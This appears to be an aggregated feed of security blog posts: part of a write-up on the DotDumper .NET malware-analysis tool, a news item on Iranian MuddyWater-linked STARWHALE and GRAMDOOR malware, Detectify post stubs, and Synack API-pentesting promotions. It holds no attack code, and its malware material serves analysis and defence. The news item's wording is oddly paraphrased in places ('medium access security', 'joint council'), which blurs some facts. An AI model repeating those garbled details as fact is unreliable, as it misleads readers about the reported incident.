DotDumper is accessible through a command-line interface, with a variety of arguments. The image below shows the help menu. Note that not all arguments will be discussed, but rather the most used ones.
The minimal requirement to run a given sample, is to provide the “-file” argument, along with a file name or file path. If a full path is given, it is used. If a file name is given, the current working directory is checked, as well as the folder of DotDumper’s executable location.
Unless a directory name is provided, the “-log” folder name is set equal to the file name of the sample without the extension (if any). The folder is located in the same folder as DotDumper resides in, which is where the logs and dumped files will be saved in.
In the case of a library, or an alternative entry point into a binary, one must override the entry point using “-overrideEntry true”. Additionally, one has to provide the fully qualified class, which includes the name space using “-fqcn My.NameSpace.MyClass”. This tells DotDumper which class to select, which is where the provided function name (using “-functionName MyFunction”) is retrieved.
If the selected function requires arguments, one has to provide the number of arguments using “-argc” and the number of required arguments. The argument types and values are to be provided as “string|myValue int|9”. Note that when spaces are used in the values, the argument on the command-line interface needs to be encapsulated between quotes to ensure it is passed as a single argument.
Other less frequently used options such as “-raceTime” or “-deprecated” are safe in their default settings but might require tweaking in the future due to changes in the DotNet Framework. They are currently exposed in the command-line interface to easily allow changes, if need be, even if one is using an older version of DotDumper when the time comes.
Logging and dumping
Logging and dumping are the two core features of DotDumper. To minimize the amount of time the analysis takes, the logging should provide context to the analyst. This is done by providing the analyst with the following information for each logged function call:
- A stack trace based on the function’s caller
- Information regarding the assembly object where the call originated from, such as the name, version, and cryptographic hashes
- The parent assembly, from which the call originates if it is not the original sample
- The type, name, and value of the function’s arguments
- The type, name, and value of function’s return value, if any
- A list of files which are dumped to disk which correspond with the given function call
Note that for each dumped file, the file name is equal to the file’s SHA-256 hash.
To clarify the above, an excerpt of a log is given below. The excerpt shows the details for the aforementioned AgentTesla sample, where it loads the second stage using DotNet’s Assembly.Load function.
First, the local system time is given, together with the original function’s return type, name, and argument(s). Second, the stack trace is given, where it shows that the sample’s main function leads to a constructor, initialises the components, and calls two custom functions. The Assembly.Load function was called from within “NavigationLib.TaskEightBestOil.GGGGGGGGGGGGGGGGGGGG(String str)”. This provides context for the analyst to find the code around this call if it is of interest.
Then, information regarding the assembly call order is given. The more stages are loaded, the more complex it becomes to see via which stages the call came to be. One normally expects one stage to load the next, but in some cases later stages utilize previous stages in a non-linear order. Additionally, information regarding the originating assembly is given to further enrich the data for the analyst.
Next, the parent hash is given. The parent of a stage is the previous stage, which in this example is not yet present. The newly loaded stage will have this stage as its parent. This allows the analyst to correlate events more easily.
Finally, the function’s return type and value are stored, along with the type, name, and value of each argument that is passed to the hooked function. If any variable is larger than 100 bytes in size, it is stored on the disk instead. A reference is then inserted in the log to reference the file, rather than showing the value. The threshold has been set to avoid hiccups in the printing of the log, as some arrays are thousands of indices in size.
Reflection
Per Microsoft’s documentation, reflection is best summarized as “[…] provides objects that encapsulate assemblies, modules, and types”. In short, this allows the dynamic creation and invocation of DotNet classes and functions from the malware sample. DotDumper contains a reflective loader which allows an analyst to load and analyze both executables and libraries, as long as they are DotNet Framework based.
To utilize the loader, one has to opt to overwrite the entry point in the command-line interface, specify the class (including the namespace it resides in) and function name within a given file. Optionally, one can provide arguments to the specified function, for all native types and arrays thereof. Examples of native types are int, string, char, and arrays such as int[], string[], and char[]. All the arguments are to be provided via the command-line interface, where both the type and the value are to be specified.
Not overriding the entry point results in the default entry point being used. By default, an empty string array is passed towards the sample’s main function, as if the sample is executed without arguments. Additionally, reflection is often used by loaders to invoke a given function in a given class in the next stage. Sometimes, arguments are passed along as well, which are used later to decrypt a resource. In the aforementioned AgentTesla sample, this exact scenario plays out. DotDumper’s invoke related hooks log these occurrences, as can be seen below.
The function name in the first line is not an internal function of the DotNet Framework, but rather a call to a specific function in the second stage. The types and names of the three arguments are listed in the function signature. Their values can be found in the function argument information section. This would allow an analyst to load the second stage in a custom loader with the given values for the arguments, or even do this using DotDumper by loading the previously dumped stage and providing the arguments.
Managed hooks
Before going into managed hooks, one needs to understand how hooks work. There are two main variables to consider here: the target function and a controlled function which is referred to as the hook. Simply put, the memory at the target function (i.e. Assembly.Load) is altered to instead to jump to the hook. As such, the program’s execution flow is diverted. The hook can then perform arbitrary actions, optionally call the original function, after which it returns the execution to the caller together with a return value if need be. The diagram below illustrates this process.
Knowing what hooks are is essential to understand what managed hooks are. Managed code is executed in a virtual and managed environment, such as the DotNet runtime or Java’s virtual machine. Obtaining the memory address where the managed function resides differs from an unmanaged language such as C. Once the correct memory addresses for both functions have been obtained, the hook can be set by directly accessing memory using unsafe C#, along with DotNet’s interoperability service to call native Windows API functionality.
Easily extendible
Since DotDumper is written in pure C# without any external dependencies, one can easily extend the framework using Visual Studio. The code is documented in this blog, on GitHub, and in classes, in functions, and in-line in the source code. This, in combination with the clear naming scheme, allows anyone to modify the tool as they see fit, minimizing the time and effort that one needs to spend to understand the tool. Instead, it allows developers and analysts alike to focus their efforts on the tool’s improvement.
Differences with known tooling
With the goal and features of DotDumper clear, it might seem as if there’s overlap with known publicly available tools such as ILSpy, dnSpyEx, de4dot, or pe-sieve. Note that there is no intention to proclaim one tool is better than another, but rather how the tools differ.
DotDumper’s goal is to log and dump crucial, contextualizing, and common function calls from DotNet targeting samples. ILSpy is a DotNet disassembler and decompiler, but does not allow the execution of the file. dnSpyEx (and its predecessor dnSpy) utilise ILSpy as the disassembler and decompiler component, while adding a debugger. This allows one to manually inspect and manipulate memory. de4dot is solely used to deobfuscate DotNet binaries, improving the code’s readability for human eyes. The last tool in this comparison, pe-sieve, is meant to detect and dump malware from running processes, disregarding the used programming language. The table below provides a graphical overview of the above-mentioned tools.
Future work
DotDumper is under constant review and development, all of which is focused on two main areas of interest: bug fixing and the addition of new features. During the development, the code was tested, but due to injection of hooks into the DotNet Framework’s functions which can be subject to change, it’s very well possible that there are bugs in the code. Anyone who encounters a bug is urged to open an issue on the GitHub repository, which will then be looked at. The suggestion of new features is also possible via the GitHub repository. For those with a GitHub account, or for those who rather not publicly interact, feel free to send me a private message on my Twitter.
Needless to say, if you've used DotDumper during an analysis, or used it in a creative way, feel free to reach out in public or in private! There’s nothing like hearing about the usage of a home-made tool!
There is more in store for DotDumper, and an update will be sent out to the community once it is available!
Iranian Hackers are Using New Spying Malware to Abuse Telegram Messenger API
In November 2021, a threat actor in the Iranian geopolitical network was discovered to have deployed two new targeted malware with “simple” backdoor functionality as part of an incursion into an unnamed government body in the Middle East.
Cybersecurity firm Mandiant attributed the attack to an uncategorized cluster it tracks as UNC3313, which it rates with “moderate certainty” associated with state-sponsored group MuddyWater.
“UNC3313 monitors and collects strategic information to support Iranian interests and decision-making,” said researchers Ryan Tomczyk, Emiel Hegebarth and Tufail Ahmed. “Guidance schemes and their associated decoys show a strong focus on targets with a geopolitical connection.”
In mid-January 2022, MuddyWater (aka Static Kitten, Seedworm, TEMP.Zagros or Mercury) was characterized by U.S. intelligence agencies as a subordinate element of Iran’s Ministry of Intelligence and Security (MOIS) that has been active since at least 2018 and is known to use a wide range of tools and methods in their activities.
The attacks were allegedly orchestrated using spear-phishing messages to gain initial access, followed by the use of offensive security tools and publicly available remote access software to move sideways and maintain medium access security.
The phishing emails were created for promotion and tricked several victims into clicking a URL to download a RAR archive file hosted on OneHub, paving the way for installing ScreenConnect, a legitimate remote access software, to gain a foothold.
“UNC3313 quickly established remote access using ScreenConnect to infiltrate systems within an hour of the initial compromise,” the researchers noted, adding that the security incident was quickly contained and resolved.
Subsequent stages of the attack included privilege escalation, performing internal reconnaissance on the target network, and executing obfuscated PowerShell commands to download additional tools and payloads to remote systems.
A previously undocumented backdoor called STARWHALE, a Windows script file (.WSF) that executes commands received from a hard-coded command and control (C2) server via HTTP, was also discovered.
The other implant delivered in the attack is GRAMDOOR, so named because it uses the Telegram API to communicate its network with an attacker-controlled server in an attempt to avoid detection, further emphasizing the use of communication tools to facilitate data theft.
The findings also align with a new joint council from the UK and US cybersecurity agencies that accuses the MuddyWater group of spy attacks targeting defense, local government, the oil and gas sector and telecommunications around the world.
The post Iranian Hackers are Using New Spying Malware to Abuse Telegram Messenger API appeared first on OFFICIAL HACKER.
New functionality added to the Detectify API
The post New functionality added to the Detectify API appeared first on Detectify Blog.
Detectify releases API v2.5
The post Detectify releases API v2.5 appeared first on Detectify Blog.
Introducing Detectify API v 2
The post Introducing Detectify API v 2 appeared first on Detectify Blog.
Newly Added Security Tests, February 3, 2017: WordPress plugins and Elastic search
The post Newly Added Security Tests, February 3, 2017: WordPress plugins and Elastic search appeared first on Detectify Blog.
Don’t Let API Penetration Testing Fall Through the Cracks
API (application programming interface) cybersecurity isn’t as thorough as it needs to be. When it comes to pentesting, web APIs are often lumped in with web applications, despite 90% of web applications having a larger attack surface exposed via APIs than user interfaces, according to Gartner. However, that kind of testing doesn’t cover the full spectrum of APIs, potentially leaving vulnerabilities undiscovered. As APIs become both increasingly important and increasingly vulnerable, it’s more important than ever to keep your APIs secure.
APIs vs. Web Applications
APIs are how software programs talk to each other. APIs are interfaces that allow software programs to transmit data to other software programs. Integrating applications via APIs allows one piece of software to access and use the capabilities of another. In today’s increasingly connected digital world, it’s no surprise that APIs are becoming more and more prevalent.
When most people think of APIs, what they’re really thinking about are APIs exposed via a web application UI, usually by means of an HTTP-based web server. A web application is any application program that is stored remotely and delivered via the internet through a browser interface.
APIs, however, connect and power everything from mobile applications, to cloud-based services, to internal applications, partner platforms and more. An organization’s APIs may be more numerous than those that can be enumerated through browsing a web application.
Differences in Pentesting
Frequently, organizations that perform pentesting on their web applications assume that a clean bill of health for web applications means that their APIs are just as secure. Unfortunately, that isn’t the case. An effective API security testing strategy requires understanding the differences between web application testing and API security testing.
Web application security mostly focuses on threats like injection attacks, cross-site scripting and buffer overflows. Meanwhile, API breaches typically occur through issues with authorization and authentication, which lets cyber attackers get access to business logic or data.
Web application pentesting isn’t sufficient for testing APIs. Web application testing usually only covers the API calls made by the application, though APIs have a much broader range of functioning than that.
To begin a web application pentest, you provide your pentesters with a list of and they test all of the fields associated with these URLs. Some of these fields will have APIs behind them, allowing them to communicate with something. If the pentesters find a vulnerability here, that’s an API vulnerability – and that kind of API vulnerability will be caught. However, any APIs that aren’t connected to a field won’t be tested.
Most organizations have more APIs than just the ones attached to web application fields. Any time an application needs to talk to another application or to a database, that’s an API that might still be vulnerable. While a web application pentest won’t be able to test these APIs, an API pentest will.
The Importance of API Pentesting
Unlike web applications, APIs have direct access to endpoints, and cyber attackers can manipulate the data that these endpoints accept. So, it’s important to make sure that your APIs are just as thoroughly tested as your web applications. By performing separate pentesting for APIs and web applications, you make sure that you have your attack surface covered.
Synack can help. To learn more about the importance of pentesting for APIs, read this white paper and visit our API security solution page.
The post Don’t Let API Penetration Testing Fall Through the Cracks appeared first on Synack.
Minimize Noise With Human-Led API Pentesting
Last week, we released a new API Pentesting product that allows you to test your headless API endpoints through the Synack Platform. Before the release, we conducted more than 100 requests for headless API pentests, indicating a growing need from our customers. This new capability provides an opportunity to get human-led testing and proof-of-coverage on this critical and sprawling part of the attack surface.
Testing APIs Through Web Applications Versus Headless Testing
For years, Synack has found exploitable API vulnerabilities through web applications. However, as Gartner notes, 90% of web applications now have a larger attack surface exposed via APIs than through the user interface. Performing web app pentests is no longer adequate for securing the API attack surface, hence the need for the new headless API pentest from Synack.
Our API pentesting product allows you to activate researchers from the Synack Red Team (SRT) to pentest your API endpoints, headless or otherwise. These researchers have proven API testing skills and will provide thorough testing coverage with less noise than automated solutions.
The Synack Difference: Human-led Coverage and Results
Automated API scanners and testing solutions can provide many false positives and noise. With our human-led pentesting, we leverage the creativity and diverse perspectives of global researchers to provide meaningful testing coverage and find the vulnerabilities that matter. SRT researchers are compensated for completing the check and are also paid for any exploitable vulnerability findings to ensure a thorough, incentive-driven test.
Additionally, each submitted vulnerability is vetted by an in-house team called Vulnerability Operations. This reduces noise and prevents teams from wasting time on false positives.
Write-ups for the testing done on each endpoint will be made available in real time and are also vetted by vulnerability operations. The reports can also be easily exported to PDFs for convenient sharing with compliance auditors or other audiences.
These reports showcase a level of detail and thoroughness not found in automated solutions. Each API endpoint will be accompanied by descriptions of the attacks attempted, complete with screenshots of the work performed. Check out one of our sample API pentest reports.
Screenshot from exportable PDF report
How It Works
Through the Assessment Creation Wizard (ACW) found within the Synack Platform, you can now upload your API documentation (Postman, OpenAPI Spec 3.0, JSON) and create a new API assessment.
For each specified endpoint in your API, a “Mission” will be generated and sent out for claiming among those in the SRT with proven API testing experience. The “Mission” asks the researcher to check the endpoint for vulnerabilities like those listed in the OWASP API Top 10, while recording their efforts with screenshots and detailed write-ups. Vulnerabilities tested for include:
- Broken Object Level Authorization
- Broken User Authentication
- Excessive Data Exposure
- Broken Function Level Authorization
- Mass Assignment
- Security Misconfiguration
- Injection
Proof-of-coverage reports, as well as exploitable vulnerability findings, will be surfaced in real-time for each endpoint within the Synack Platform.
Real-time results in platform
Through the Synack Platform, an exploitable vulnerability finding can be quickly viewed in the “vulnerabilities” tab, which rolls up finding from all of your Synack testing activities. With a given vulnerability, you can comment back and forth with the researcher who submitted the finding, as well as request patch verification to ensure patch efficacy.
![]()
Retesting On-demand
As long as you’re on the Synack Platform, you have on-demand access to the Synack Red Team. To that end, APIs previously tested can be retested at the push of a button. Simply use the convenient “retesting” workflow to select the endpoints you want to retest and press submit. This will start a new test on the specified endpoints, sending out the work once more to the SRT and producing fresh proof-of-coverage reports. This can be powerful to test after an update to an API or meet a recurring compliance requirement.
![]()
Get Started
Get started today by downloading our API pentesting data sheet.
The post Minimize Noise With Human-Led API Pentesting appeared first on Synack.
Synack Expands Security Platform with Adversarial API Pentesting
Synack, the premier security testing platform, has launched an API pentesting capability powered by its global community of elite security researchers. Organizations can now rely on the Synack platform for continuous pentesting coverage across “headless” API endpoints that lack a user interface and are increasingly exposed to attackers.
“Synack’s human-led, adversarial approach is ideal for testing APIs that form the backbone of society’s digital transformation,” said Synack CTO and co-founder Mark Kuhr, a former National Security Agency cybersecurity expert. “We are thrilled to offer customers a unique, scalable way to secure this growing area of their attack surfaces.”
Gartner estimates API abuses will be the most common source of data breaches in enterprise web applications this year. Synack enables organizations to verify exploitable API vulnerabilities like broken authorization and authentication–noted in the OWASP API top 10–can’t be abused by malicious hackers.
“Many organizations are struggling to find the top-tier cyber talent needed to root out API-specific vulnerabilities,” said Peter Blanks, Chief Product Officer at Synack. “We’re excited to extend our Synack platform to provide human-powered offensive security testing on APIs.”
Synack’s headless API capability builds on years of API pentesting experience through web and mobile applications. The new platform features allow customers to enter API documentation to guide testing scope and coverage. Next, researchers with the Synack Red Team attempt to exploit API endpoints in the way a real external adversary would.
Of the Synack Red Team’s over 1,500 global members, only those with proven API testing skills are activated on API requests, reducing noise. Synack’s Special Projects division led over 100 successful pentests against headless APIs in 2022, providing customers with critical proof-of-coverage reports while validating researchers’ API expertise.
Vulnerability submissions and testing reports are routed through Synack’s Vulnerability Operations team for a rigorous vetting process before being displayed in the platform, minimizing false positives and ensuring high-quality results.
For more information about Synack’s API security testing, visit our Solutions page.
The post Synack Expands Security Platform with Adversarial API Pentesting appeared first on Synack.